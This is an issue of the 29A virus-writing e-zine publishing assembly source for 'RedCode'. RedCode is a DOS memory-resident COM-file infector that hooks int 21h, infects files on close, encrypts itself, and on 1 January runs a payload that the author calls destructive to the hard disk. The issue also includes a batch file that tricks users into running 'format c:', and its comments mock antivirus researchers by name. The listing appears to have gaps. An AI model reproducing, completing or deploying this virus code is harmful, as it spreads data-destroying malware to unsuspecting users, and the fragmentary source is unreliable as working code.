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29A Issue 02 05 11
; ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±°
;±±±° ±±±°
;±±° Virus name: RedCode ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ±±°
;±±° Writer: Wintermute/29A ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ±±°
;±±° Size: Nah, not much ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ ±±°
;±±° Origin: Spain ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ ±±°
;±±° Finished: When all was done ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ ±±°
;±±±° ±±±°
; ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±°
; For those who still don't know what RedCode and CoreWars are, go and
; look for some webpage in the net so you'll later understand the meaning
; and the reason to be of this virus... otherwise you'll feel like if you
; were trying to understand chinese scripts :)
; I started writing this virus to try to make a payload which came up to my
; mind one day after one couple kalimotxos ( wine+coke ) :*) and intensive
; Marilyn Manson sessions... what about a CoreWars game in your computer ?
; Imagine, two programs which fight as in CoreWars, trying to make impossi-
; ble to each other to do its next move and thus win the game... imagine,
; also, that this game takes place in the first sectors of your HD.
; So that's the virus payload.
; The payload is destructive ( because of obvious reasons, not just because
; now I like to destroy computers and that stuff ). However, the user may
; skip any damage and save his data just by not pressing 'enter' when the
; payload appears. By pressing the "G" key right now you will be able to see
; the NON-destructive version of the payload.
; About the virus itself, it's a 'lame TSR COM infector' which infects on
; closing/disinfects on opening using SFTs; some kind of 'joke virus', with
; some references to "near friends" in the code and in the comments ;-D
; Each time I look outside
; my mother dies, I feel my back is changing shape
; When the worm consumes the boy it's never
; considered rape.
; When they get to you
; Prick your finger it is done...
; the moon has now eclipsed the sun...
; the angel has spread his wings...
; the time has come for better things...
; ( Marilyn Manson )
assume cs:codigo,ds:codigo,es:codigo
codigo segment
org 00h
bufferpos equ virus_end-offset buffer
virus_size equ virus_end-virus_start
encrypt_size equ encrend-encrstart
virus_start label byte
call delta_offset
mov si,sp
mov si,word ptr [si]
sub si,offset delta_offset
call non_copied
inc sp
inc sp
mov ax,0bacah
int 21h
cmp ax,0bacah
jz instalados
mov ax,cs ; Oh, no, another Tsr routine !
dec ax
mov es,ax
mov bx,es:[3]
sub bx,((virus_size+15)/16)+1
mov ah,4ah ; Come on, resize...
push ds
pop es
int 21h
mov ah,48h ; ( There's gotta be a place for me )
mov bx,((virus_size+15)/16)
int 21h
push ax
dec ax
mov es,ax
mov word ptr es:[1],8 ; Typical residence routine with Dos
pop es ;routines and no low level ( let's be
xor di,di ;simple :-PP )
push si
lea si,realstart+si
push cs
pop ds
mov cx,virus_size/2+3 ; Hey, memory, here I am
rep movsw
pop si
push es
pop ds
mov ax,3521h ; Where are you, my love ?
int 21h
mov ds:word ptr int21h,bx
mov ds:word ptr int21h+2,es
lea dx,Where_it_happens
mov ax,2521h ; Come here ;)
int 21h
push cs cs
pop ds es
mov di,100h ; Restore host
push di
lea si,[si+buffer]
pushed: dw 0
pop cs:word ptr [pushed]
push ax bx cx dx es ds bp di si
push cs:word ptr [pushed]
pop cs:word ptr [pushed]
pop si di bp ds es dx cx bx ax
push cs:word ptr [pushed]
pop cs:word ptr [pushed]
push word ptr es:[di+0dh] ; Time
push word ptr es:[di+0fh] ; Date
push word ptr es:[di+04h] ; Sets attribs
mov byte ptr es:[di+04h],0
mov byte ptr es:[di+2],2 ; Opening
push cs:word ptr [pushed]
push bx ; We get file's Sft
mov ax,1220h
int 2fh
jc nein
xor bx,bx
mov bl,byte ptr es:[di]
mov ax,1216h
int 2fh
pop bx
pop cs:word ptr [pushed]
mov ax,3524h
call callint21
push es bx
mov ah,25h
push ax cs
pop ds
lea dx,int24handler
call callint21
push cs:word ptr [pushed]
where_it_happens: ; Main center ( int21h handler )
cmp ax,0bacah ; La del coche se escribe con b :-P
jz check
cmp ah,03dh
je disinfect
cmp ax,06c00h
je disinfect
cmp ax,4b01h
je disinfect
cmp ah,03eh
jnz vamos_al_salto
jmp infect_file
jmp salto
call push_regs
mov ah,02ah
int 21h
cmp dx,0101h ; 1st january. Why not ?
jnz dont_payl ; Japi niu yiar !
jmp do_payload
call pop_regs
call push_regs
cmp ax,6c00h
jz extended
mov si,dx
mov di,ds
call set_int_24
mov ds,di ; Opens the file that was going to
mov dx,si ;be opened
xor cx,cx
mov ax,3d00h
call callint21
jnc vamos_bien
jmp fuera_delto
xchg ax,bx
call get_sft
jc outta_jiar
push cs ; Is it infected ?
pop ds
mov ah,3fh
mov cx,2
lea dx,buffer
call callint21
cmp word ptr ds:[buffer],05951h
jnz outta_jiar
call push_stuff
; Let's start disinfecting
mov ax,word ptr es:[di+11h] ; File length
push ax
sub ax,bufferpos
mov word ptr es:[di+15h],ax ; We point to the buffer
mov ah,3fh
mov cx,5h
lea dx,buffer ; 5 bytes read
call callint21
mov si,dx
mov cx,5h
des_loop: ; We decrypt em
xor ds:byte ptr[si],0feh
inc si
loop des_loop
mov word ptr es:[di+15h],0
mov ah,40h
mov cx,5h
lea dx,buffer
call callint21
pop ax
sub ax,virus_size
mov word ptr es:[di+15h],ax
mov ah,40h
xor cx,cx
call callint21
pop ax ; Recovers attributes
mov byte ptr es:[di+4h],al
mov ax,5701h
pop dx ; Date
pop cx ; Time
call callint21
mov ah,3eh
call callint21
pop ax dx ds ; Restore int24h
call callint21
call pop_regs
jmp salto
call push_regs
mov si,bx
call set_int_24 ; Errors Int
mov bx,si
call get_sft ; actual Sft
jc outta_jiar
push cs
pop ds
call push_stuff
cmp word ptr es:[di+29h],'MO'
jnz cerramos
cmp byte ptr es:[di+28h],'C'
jnz cerramos
cmp word ptr es:[di+11h],01388h
jna cerramos
cmp word ptr es:[di+11h],0ea60h
ja cerramos
mov word ptr es:[di+15h],0 ; Five first bytes
mov ah,3fh
mov cx,5
lea dx,buffer
call callint21
cmp word ptr ds:[buffer],'ZM'
jz cerramos
cmp word ptr ds:[buffer],'MZ'
jz cerramos
cmp word ptr ds:[buffer],05951h ; Are we there ?
jz cerramos
mov ax,word ptr es:[di+11h]
mov word ptr es:[di+15h],ax
push ax di
call aporesaguarra
pop di ax
sub ax,5
mov word ptr cs:[jmptous+1h],ax
mov word ptr es:[di+15h],0h
mov ah,40h
lea dx,entrada
mov cx,5
call callint21
jmp rest_all
mov ax,0013h ; Mode 13h
int 10h
mov dx,09h ; We write the first message about
mov bx,7h ;redcode_something
call set_cursor
push cs
pop ds
lea si,text1
call write
mov ax,0a000h ; We draw the complete screen; squares
mov ds,ax ;of the game, blablabla ( this is done
mov bx,320*10+30 ;from here to the next comment )
mov si,bx
mov cx,51d
push bx
push cx bx si
mov cx,125d
mov word ptr ds:[bx],808h
mov byte ptr ds:[si],8h
add si,320d
inc bx
inc bx
loop line
pop si bx cx
mov ax,cx
and al,1
jnz not_this_time
add bx,320d*5d
add si,5d
loop block
pop bx
mov si,bx
mov cx,125d
mov word ptr ds:[bx],0f0fh
mov word ptr ds:[bx+09C40h],0f0fh
mov byte ptr ds:[si],0fh
mov byte ptr ds:[si+250d],0fh
add si,320d
inc bx
inc bx
loop lados
mov byte ptr ds:[si+250d],0fh
push ds
push cs
pop ds
mov dx,1208h ; Write the text about today's contest
mov bx,42h
call set_cursor
lea si,text2
call write
mov dx,1402h ; We introduce the first warrior of
call set_cursor ;this night
mov bx,36h
lea si,text3
call write
mov dl,12h ; and...
call set_cursor
mov bx,42h
lea si,text4
call write
mov dl,17h ; The second fighter !
call set_cursor
mov bx,2h
lea si,text5
call write
pop ds ; A000
xor ax,ax
mov es,ax
; Initial positions
mov al,byte ptr cs:[400h] ; Gets coordinates
cmp al,248d
jna @nopasana
mov al,248d
mov byte ptr cs:[prim_xpos],al ; for the first player
mov byte ptr cs:[prim_at_x],al
push ax
mov dl,byte ptr cs:[46ch] ; Not the timer O:)
and dl,01fh
cmp dl,24d
jna @palante
mov dl,24d
mov byte ptr cs:[prim_ypos],dl
mov byte ptr cs:[prim_at_y],dl
pop ax
mov cx,09h ; Colour
call trazar ; We draw initial 1st fighter's position
mov al,byte ptr es:[46ch] ; Same for the 2nd one
cmp al,248d
ja @x_pos_again
cmp byte ptr cs:[prim_xpos],al ;checking they aren't on the
jz @x_pos_again ;same pos.
mov byte ptr cs:[seg_xpos],al
mov byte ptr cs:[atta_x2],al
push ax
mov al,byte ptr es:[46ch]
and al,01fh
cmp al,24d
ja @y_pos_again
mov dl,al
cmp byte ptr cs:[prim_ypos],al
jz @y_pos_again
mov byte ptr cs:[seg_ypos],al
mov byte ptr cs:[atta_y2],al
pop ax
mov cx,0ah ; Player's colour
call trazar
inc al
cmp al,248d
jna @bien
sub al,250d
inc dl
cmp dl,24d
jna @bien
xor dl,dl
@bien: mov byte ptr cs:[Spe_posx],al
mov byte ptr cs:[Spe_posy],dl
mov cx,0ah
call trazar
mov ah,07h ; When user presses a key...
int 21h ;fiesta starts !!!
; AND THE GAME BEGINS... the warriors start fighting, placed each
; of them in a random sector... first, Big Butt Gass¢ will move.
; Later, Himmler Fewster will.
; Big Butt Gass¢
; Data: Big Butt Gass¢, also known as 'Babe', is a brave Yorkshire
; little pig whose only objective in this life is becoming a
; shepherd; he believes he is a sheepdog.
; Albeit, in all his life trying to be a sheepdog, he has suffered
; much because of some sheeps that didn't understand his likes or
; why does he want to became a sheepdog
; Sheeps didn't understand him, and told him things as " Hummm,
; why do we need a pig that only insults us and tells us that this
; or that kind of food is bad for us ? We prefer dogs !!! ". Or
; even worse, dogs themselves, insulting him and depressing him;
; cause of this, he had to go out from GRANJA.R34 :'''-(
; But one day, Big Butt knew "Rata Grasienta", a good friend that
; had simpathy to Big; discovered him RedCode, a kickass game from
; which he could demonstrate he was someone ( or just sink into
; his bullshit... )
; So, here he is, come on Gass¢ !
; Listing: ( could be bigger, but... how big do you thing the
; brain of a pig is ? )
; BEGIN Gronf.War ( .Warrior )
; dat -1
; > add #4 -1
; mov -2 @-2
; jmp -2
mov al,byte ptr cs:[prim_at_x] ; Big Butt Gass¢ moves
mov dl,byte ptr cs:[prim_at_y]
add al,4h
cmp al,248d
jna correcto
sub al,250d
inc dl
cmp dl,24d
jna correcto
xor dl,dl
mov byte ptr cs:[prim_at_x],al
mov byte ptr cs:[prim_at_y],dl
mov cx,36h
call trazar
call ne1destroyed ; Checks if someone was destroyed
; Now it's Himmler Fewster's turn
; Himmler Fewster
; Our second warrior, was born from a FidoPet NC and a moderator
; whose secret vocation was beeing a Beverly Hills high level
; prostitute.
; So, Fewster's familiar environment wasn't good at all, and
; his personality went into violence and so; so young, he started
; playing with swastikas and insulting all people of different
; races than his; all non-AVer people
; Then, his problems began. He hated VXers and only had friends
; from the God chosen race, AVers, the race which at the judgement
; day would sit right ( or was it left ? ) of God
; At last, he became moderator of a Fido echoarea, recommended
; by his father and some friends from his race; from there, he
; could establish terror and silence about viruses. It was
; wonderful: if someone liked viruses, he could just squash and
; silence his dirty mouth. Even, he could make that stupid
; non-AVers believe that viruses jump from diskette to diskette,
; that they were an alive problem... there were no limits, he got
; the POWER.
; Albeit, there was a little problem, the last pitfall in Himmler
; Fewster's life; some FidoPet and Internet fools called "the
; PowerRangers" that attacked his ideas and defended ( oh, heresy! )
; that virus writers knew most about viruses than antivirus
; writers...
; And... is there a better method than intelligence to attack
; them ? And... which method is better than a good RedCode to do it ?
; Bontchy, Fewster, and another AVer that had some problems to find
; the difference between F-potato chips and polymorphic engines,
; made the definitive warrior to attack...
; Listing:
; BEGIN VIRUS_INFO.WAR ( Written in Basic; although Gass¢'s
; warrior is one sector long, this is two sectors long, cause
; it's written in the AVers's secret megak00l superlanguage...
; 0f c0z, ZX Spectrum's Basic ! )
; 5 let a=initxpos
; 10 input " Who are you/virus attitude/will you obey me? ",a$
; 20 if a$<>"I'll be your slave" then 40
; 30 print " Whatever ": Rem blah
; 40 print " Position banned "
; 50 let a=a-1
; 60 goto 10
mov al,byte ptr cs:[atta_x2] ; Big Butt Gass¢ moves
mov dl,byte ptr cs:[atta_y2]
dec al
cmp al,0ffh
jnz finiquita
mov al,248d
dec dl
cmp dl,0ffh
jnz finiquita
mov dl,024d
mov byte ptr cs:[atta_x2],al
mov byte ptr cs:[atta_y2],dl
mov cx,2h
call trazar
call ne1destroyed
mov dx,3dah ; Delay ( monitor retrace )
del1: in al,dx
test al,8
jne del1
del2: in al,dx
test al,8
je del2
jmp movements
set_cursor: ; Place cursor where told by the program
mov ah,2
xor bh,bh
int 10h
or al,al
je finished
mov ah,0eh
int 10h
jmp write
finished: ret
push ax dx
; We've got X pos in Al, Y pos in Dl
xor dh,dh
xor ah,ah
add ax,31d ; Now, we've got in bx the X
xchg bx,ax
mov ax,5d
mul dx
add ax,11d
xchg ax,dx
mov ax,320d
mul dx
add bx,ax
mov dl,cl
mov cl,4
push bx ;*
mov byte ptr ds:[bx],dl
add bx,320d
loop @paint
pop bx
pop dx ax
; ********** CHECK ************
Ne1destroyed: ; Routine to check if some crap were put
; on the players's
cmp byte ptr cs:[prim_xpos],al ; positions
jnz not_gasso
cmp byte ptr cs:[prim_ypos],dl
jnz not_gasso
jmp gassodied
cmp byte ptr cs:[seg_xpos],al
jnz not_himmler
cmp byte ptr cs:[seg_ypos],dl
jnz not_himmler
jmp himmlerdied
cmp byte ptr cs:[Spe_posx],al
jnz not_himmler2nd
cmp byte ptr cs:[spe_posy],dl
jnz not_himmler2nd
jmp himmlerdied
gassodied: lea si, himmler
mov bx,2h
jmp himmlermid
himmlerdied:lea si, gasso
mov bx,36h
himmlermid: push cs
pop ds
mov dx,0701h
call set_cursor
call write
jmp $
; ********** DATA **********
Spe_posx: db 0 ; First zone is for the payload
Spe_posy: db 0
prim_xpos: db 0
prim_ypos: db 0
prim_at_x: db 0
prim_at_y: db 0
seg_xpos: db 0
seg_ypos: db 0
atta_x2: db 0
atta_y2: db 0
text1: db 'Viral RedCode Implant',0
text2: db 'Today''s contest between',0
text3: db 'Big Butt Gasso',0
text4: db 'and',0
text5: db 'Himmler Fewster',0
entrada: db 51h,59h
jmptous: db 0e9h,?,?
buffer: db 51h,59h,90h,0cdh,20h
its_name: db 'The RedCode virus by Wintermute/29A; yeah, not a kickass '
db 'at all, but with a funny payload, don''t you agree ?',0
db 'Watch the payload !'
encrend label byte
salto: db 0eah
int21h: dw 0,0
callint21: pushf
call dword ptr cs:[int21h]
mov al,3
xor si,si
call encrypt
push cs
pop ds
xor dx,dx
mov cx,virus_size
mov ah,40h
call callint21
call encrypt
lea di,encrstart+si
mov cx,encrypt_size
xor_loop: xor byte ptr cs:[di],0feh
inc di
loop xor_loop
virus_end label byte
mov word ptr encrstart-2+si, encrypt-encrstart
codigo ends
end realstart
; BonusTrack
; And finishing this, I wanted to give an oportunity to my friend Christian;
; the oportunity of publishing a virus in this place of 29A: I told him, I can
; publish your virus in 29A ! And so I do, returning to my master in virus
; writing all I debt him, giving him my most sincerely thanks for being my
; master in viruswriting, the light that iluminated the way on my first steps
; making a Com non-tsr and that has brought me to the vast knowledge with his
; impressive wisdom.
; Here it is, his most important creation; works under Win95/NT ( suppose ),
; Ms-dos, Win3.1 in an Ms-dos window, and I dunno if Linux and Os/2 have
; that kind of windows, but... 100% destructive, of course. Doesn't have
; polymorphism cause it doesn't need it, and it's stealth "after-execution",
; autodesinfecting itself when run. Here you are...
; === Cut INSTALL.BAT ===
; echo off
; :main
; cls
; echo.
; echo.
; echo Beware !!!!!!, this is a virus. Your Personal Computer has been
; echo infected by Cyberkurdt's sublime virus, PCVIRUS; the first spanish
; echo virus completely made on EDIT, compatible within Dos, Windows, Win95,
; echo and maybe in a DOS OS2 Window...
; echo This virus presents some characteristics as multiple encryption,
; echo some loop, /\/\egak00l interrups access, kewl&kickass formatting and
; echo and self-disinfection.
; pause
; goto loop
; :encrypt
; Encryption
; a=! b=" c=% d=& e=) f=? g:¨ h=" i=&
; j=/ k=^ l=ù m=ù n= ¤=" o=! p=ú q=%
; r=& s=R t=I u=: v=; w=¥ x=> y=< z=ª
; !ú)/!&!R($)%$=%ú=$)ú$)"ú"!=ú"=ú"?!ú=!?$^P^!"ú/(ú$/"ú"ú#@||\$/$($($(")ú"!ú)
; %(&ú$)%"=$ú!"=$!"?ú!"ú=ú")$ú(%$$ú/I%%&%&/$%$ú%("$"ú($)"!ú)!"ú=!"ú")$"(ú$(")
; ª#@#@|#@#@|@###@##%)$)%$ú¥^*ù¥:;;>;Z>::Zú>ùZ#>X>Z<zx'<zx0<>X:>Z>Xz@<0x<z
; !¦"ú$%&/()=?¨**ù_`+ï¤ï¤-.ï..,.,-,.m,m-.,-m.-.----------------------------
; goto end
; :routine
; goto loop2
; :loop
; goto routine
; :pepe
; cls
; choice /C:ns Press "y" and you will save your Personal Computer, press "n"
; and you won't see the light of day...
; if errorlevel 2 goto destruct
; cls
; echo You're safe ! Yeah !, but..... are you sure that strange BAT isn't
; echo another hyper-super-destructive virii ?
; echo.
; echo.
; pause
; goto end
; :loop2
; goto pepe
; :destruct
; cls
; echo Ohhhh... shit, guy, you screwed it up; doesn't matter what you type
; echo now, the data on your hard disk is going to die... whatever, press
; echo "yes" and you will see a k00l porn animation :))''
; pause
; cls
; format c:
; goto end
; :end
; cls
; echo.
; echo.
; echo.
; echo.
; echo.
; echo.
; echo.
; echo.
; prompt Divided by Zero; Multiplied by Zero dot two; press Ctrl+Alt+Del
; === Cut ===